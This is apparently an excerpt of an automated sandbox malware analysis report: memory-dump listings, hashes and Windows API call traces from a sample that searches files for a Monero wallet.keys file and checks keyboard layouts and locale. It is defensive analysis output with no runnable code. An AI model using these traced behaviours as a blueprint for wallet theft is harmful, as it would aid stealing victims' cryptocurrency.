                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 03ed694de09d9a5b0e5c2a48222840233c2a27b343cd1ec731c20b06d8fda5a5
                          • Instruction ID: 357df8ef15db7d9265ebf128b294d3884562cfa0f54913facb7ec3bb88625891
                          • Opcode Fuzzy Hash: 03ed694de09d9a5b0e5c2a48222840233c2a27b343cd1ec731c20b06d8fda5a5
                          • Instruction Fuzzy Hash: AFF17D7181011C9BDB25EB61DC9AFEE7338AF54304F9441EEE51A62091EF306F8ADE52
                          Function 00CBDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CD14B0,00CD0C2A), ref: 00CBDAEB
                          • StrCmpCA.SHLWAPI(?,00CD14B4), ref: 00CBDB33
                          • StrCmpCA.SHLWAPI(?,00CD14B8), ref: 00CBDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00CBDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: fc0b1528939e15940ad31e4e760a42e33b86d6a76c8822562c61c3def5dded51
                          • Instruction ID: c4343229ea82f5bf2f45980a02e8624ca2f182d97a5d3d05470710f4acc3376e
                          • Opcode Fuzzy Hash: fc0b1528939e15940ad31e4e760a42e33b86d6a76c8822562c61c3def5dded51
                          • Instruction Fuzzy Hash: 6B9123729101089BCB14FB71EC5AEED737DAB84304F40866CF91A96181FE349B4DDB92
                          Function 010851C6 Relevance: 12.8, Strings: 9, Instructions: 1581COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A4}$CBo$]$s$p!g}$vP)z$*M/$7wn$R}m$h1#
                          • API String ID: 0-4248928686
                          • Opcode ID: ddd2f22aa3e715035979eed07db9bbfebcb228b87ae539dbda9a3d32cab7f33f
                          • Instruction ID: 4bec45ac911768d9acacdd08de0d2cf48d0371a70e63a0f631f993b304b89969
                          • Opcode Fuzzy Hash: ddd2f22aa3e715035979eed07db9bbfebcb228b87ae539dbda9a3d32cab7f33f
                          • Instruction Fuzzy Hash: 74B2E4F350C2049FE304AE29EC8567AFBE9EF94720F1A492DE6C5C3744EA3598418797
                          Function 00CC7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00CD05AF), ref: 00CC7BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00CC7BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00CC7C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00CC7C62
                          • LocalFree.KERNEL32(00000000), ref: 00CC7D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: a2d204d6e48159c1a324f444b796b0c4d740530db61cc4d3ae2ced20a39b01b5
                          • Instruction ID: eba4617a347e9f676f943f643a1276f2b5c73ae4512939ec57481da4c860a768
                          • Opcode Fuzzy Hash: a2d204d6e48159c1a324f444b796b0c4d740530db61cc4d3ae2ced20a39b01b5
                          • Instruction Fuzzy Hash: BE413A7194021CABCB24DB95DC9DFEEB374FB44704F204299E50A66280DB742F89CFA1
                          Function 01088755 Relevance: 10.4, Strings: 7, Instructions: 1671COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %(O$:/=$R$vu$RPo$n$ju$nC+
                          • API String ID: 0-2476655910
                          • Opcode ID: 54bb480ce785f37dbb2d73d226a6c7fb1859d883cfa5ab3aff1c2feac49d68ae
                          • Instruction ID: efb684b11ca9ba05430e89688a16e3a1d8d95f561471e7a25b78545c66b1b1d1
                          • Opcode Fuzzy Hash: 54bb480ce785f37dbb2d73d226a6c7fb1859d883cfa5ab3aff1c2feac49d68ae
                          • Instruction Fuzzy Hash: 1EB227F360C3049FE3046E6DEC8567AFBE9EF94620F1A453DEAC4C3744EA7598018696
                          Function 0107992C Relevance: 10.4, Strings: 7, Instructions: 1655COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /!~}$C@;/$G0gr$Zk':$`Jo$aX<]$~Gw
                          • API String ID: 0-3339710154
                          • Opcode ID: 090f488eb86893b5f5cb0ae194ff36796004f9da2179e073737575a70ee04b35
                          • Instruction ID: 73baf3a04a33cc8c3fbb0459421528d5afdd4b2db7d5846e17c05feacb58022f
                          • Opcode Fuzzy Hash: 090f488eb86893b5f5cb0ae194ff36796004f9da2179e073737575a70ee04b35
                          • Instruction Fuzzy Hash: F1B24CF3A082049FE3046E2DEC8567AFBE9EFD4720F16863DEAC5C3744E63558058696
                          Function 00CBE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CD0D73), ref: 00CBE4A2
                          • StrCmpCA.SHLWAPI(?,00CD14F8), ref: 00CBE4F2
                          • StrCmpCA.SHLWAPI(?,00CD14FC), ref: 00CBE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 36564fc745d6e61cf70566970d55c48b75187dbf961e766e4ded1127bcff4d81
                          • Instruction ID: b6aeec38fb58acfcc2f3af2631a142c554f748e0a99eb00e61f83728eb6cd1ac
                          • Opcode Fuzzy Hash: 36564fc745d6e61cf70566970d55c48b75187dbf961e766e4ded1127bcff4d81
                          • Instruction Fuzzy Hash: 23120C7191011C9BDB14FB61DC9AFED7338AF94304F4041ADE50AA6191EE346F4ADFA2
                          Function 01072E6B Relevance: 9.2, Strings: 6, Instructions: 1652COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %-q$4{}$]\7s$r1?-$v`}d$;1
                          • API String ID: 0-3145308216
                          • Opcode ID: afcaf484e71255cd8ea1f78bb3e02f1cf46249ba2d6e2bf430e1f76e352d3461
                          • Instruction ID: 9c20341f7a4e442cb93df5143b98e20954d545bf80e11b337646e573d2e7529a
                          • Opcode Fuzzy Hash: afcaf484e71255cd8ea1f78bb3e02f1cf46249ba2d6e2bf430e1f76e352d3461
                          • Instruction Fuzzy Hash: 5DB209F360C2009FE3086E2DEC9577ABBE5EBD4320F1A463DEAC5C7744E93558058696
                          Function 0107CF78 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &#g$,ww$B_$]~!$u)DK$y\]v
                          • API String ID: 0-472964207
                          • Opcode ID: dd90b6177c85ee9477f05eb86428375a6c371f77f161138534ab200149a57d8b
                          • Instruction ID: 717007ecc6047f894622dfa7f4f4e202fa3754aa5b04c8d2bed70706b48b7225
                          • Opcode Fuzzy Hash: dd90b6177c85ee9477f05eb86428375a6c371f77f161138534ab200149a57d8b
                          • Instruction Fuzzy Hash: A8A2E4F350C204AFE304AF29EC8566ABBE5EF94320F16893DE6C4C3744E63598558B97
                          Function 01077DD1 Relevance: 7.9, Strings: 5, Instructions: 1664COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ar^]$DT~$I6pr$u_o$wz
                          • API String ID: 0-414213122
                          • Opcode ID: b9b8d0faf4fb03475ea4cc75882ef050ff19e0792ccc057fd142ad1c0041a72d
                          • Instruction ID: b0a787fcd4e2c34c9868535774c049296941c809ae09f068ba6d91f9d23da957
                          • Opcode Fuzzy Hash: b9b8d0faf4fb03475ea4cc75882ef050ff19e0792ccc057fd142ad1c0041a72d
                          • Instruction Fuzzy Hash: 7AB228F3A0C2049FE704AE2DEC8567ABBE9EFD4320F1A453DEAC4C7744E63558058696
                          Function 01081E16 Relevance: 7.8, Strings: 5, Instructions: 1536COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [+|$[>3$\46w$gvT$5>
                          • API String ID: 0-3837273054
                          • Opcode ID: d6e80825482e31148da9ff8773bfb7b822dd425194b5cd9228f9aaf87497aea9
                          • Instruction ID: 8eae7691d2f33825aded32b553790e38c78f6c12c13b85d7ae082bae81f23f7e
                          • Opcode Fuzzy Hash: d6e80825482e31148da9ff8773bfb7b822dd425194b5cd9228f9aaf87497aea9
                          • Instruction Fuzzy Hash: 5CA2E4F360C200AFE7046E2DEC8567AFBE9EF94620F1A493DE6C5C3344E63598158697
                          Function 00CBC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
